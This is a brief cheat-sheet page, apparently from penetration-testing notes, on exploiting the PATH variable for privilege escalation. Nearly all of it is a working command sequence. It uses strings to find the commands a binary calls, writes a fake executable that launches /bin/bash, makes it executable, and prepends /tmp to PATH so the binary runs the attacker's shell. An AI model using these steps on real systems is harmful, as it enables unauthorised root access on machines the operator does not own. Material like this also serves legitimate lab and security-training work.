PATH Variable
Exploiting Path Variable
# Get the strings command to get the runtime calls
strings /path/to/binary
# Create the executable within /tmp dir
echo "/bin/bash" > "command"
# Give executable permissions
chmod +x "command"
# Amend the PATH env
export PATH=/tmp:$PATH
# Execute it
It will trigger the one within /tmp we created.
Last modified 3mo ago